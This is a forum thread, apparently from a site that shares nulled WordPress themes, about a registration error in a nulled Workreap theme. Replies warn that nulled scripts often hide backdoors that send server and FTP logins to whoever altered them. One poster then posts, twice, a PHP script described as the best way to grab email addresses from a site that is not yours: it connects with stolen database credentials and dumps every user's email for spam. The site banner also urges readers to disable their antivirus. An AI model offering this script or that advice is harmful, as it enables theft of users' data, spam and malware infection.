Hi on Workreap theme when i try register as freelancer or employer on the 2nd page of registration when it requests password and email, when i agree to T&Cs and go next i get an error that says "no kiddies please" what am i doing wrong - i copied the child theme into the themes folder and activated it, did not help, one other thing is i need to change the registration pages(txt), can i just copy them into the child theme and make the changes there. i need to know what they are called and where they are located. Hope someone can help
-
You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.
Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"
Workreap HELP on error "no kiddies please"
- Thread starter Hillel
- Start date
Sounds like this is a non retail version of the script and whoever nulled it for you decided to have some fun in the code... I am guessing you used the config file and filled in your server login details...
Common trick we used to see on Envato all the time, easy way to hijack a domain and website.
Might want to go change them quickly...
Common trick we used to see on Envato all the time, easy way to hijack a domain and website.
Might want to go change them quickly...
I installed worpress clean then afterwards installed the theme from a zip, it was a nulled theme. Tonight i downloaded the Workreap theme from here and renamed the folder in my wordpress install to old_workreap then uploaded the version i installed from here. i will go change the passwd and username to be safe, but after i uploaded theme (the one i downloaded from here) and activated it , i got the same error when trying to register as a freelancer or employer.
The issue is pretty straight forward. Many times people will see a script online, Null it and pass it on. So many people get ahold of it and can change it, rezip it and post it. Unless the person using it goes through each files line by line to look at the code, then whatever anyone programmed in there is what you are stuck with.
Case in point:
Many times while working at Envato I would see a script that would have calls back to an email address that would want complete email and password, all server ftp logins.
YOU as the end customer downloaded the nulled script, filled out your information to use the script and uploaded it. Whoever added the extra calls to the script just got an email with all your information in it.
Even if you downloaded a nulled script you STILL need to perform due dilligence to make sure that there is nothing hostile in the script.
That was my job at Envato, sift through thousands and thousands of php code looking for backdoors that authors put in that would or could compromise a site's security.
Case in point:
Many times while working at Envato I would see a script that would have calls back to an email address that would want complete email and password, all server ftp logins.
YOU as the end customer downloaded the nulled script, filled out your information to use the script and uploaded it. Whoever added the extra calls to the script just got an email with all your information in it.
Even if you downloaded a nulled script you STILL need to perform due dilligence to make sure that there is nothing hostile in the script.
That was my job at Envato, sift through thousands and thousands of php code looking for backdoors that authors put in that would or could compromise a site's security.
This is the best way to grab email addresses from a site that is not yours (In example, you nulled a script but collected calls)
<?php
$servername = "";
$username = "";
$password = "";
$dbname = "";
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT email FROM users";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
echo "<table><tr>Complete eMail stack:<BR><BR></tr>";
// output data of each row
while($row = $result->fetch_assoc()) {
echo "<tr><td>".$row["email"]."</td></tr>";
}
echo "</table>";
} else {
echo "0 results";
}
$conn->close();
?>
<?php
$servername = "";
$username = "";
$password = "";
$dbname = "";
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT email FROM users";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
echo "<table><tr>Complete eMail stack:<BR><BR></tr>";
// output data of each row
while($row = $result->fetch_assoc()) {
echo "<tr><td>".$row["email"]."</td></tr>";
}
echo "</table>";
} else {
echo "0 results";
}
$conn->close();
?>
ok thanks, i now understand better. i am new to this, i have recently started learning PHP. so i dont think that i would be able to know if there was something in the code that should not be there. I will look anyway, good way to learn anyway.
Thanks again.
Thanks again.
That script can be used on any website or even from Desktop. Once a person has your username and server details, they pretty much can do whatever they want to. The script above would pull every single email address from all users in your website in an easy copy and paste file into their email spam program.
Thanks for all your help this evening I will delete the nulled themes i got before and use the ones I downloaded from here and I live in Cape Town in South Africa.
Why is she banned? Damn. She just tried to help I guess.I am a php coder. I write php better than I speak english and I live in the USA...
Similar threads
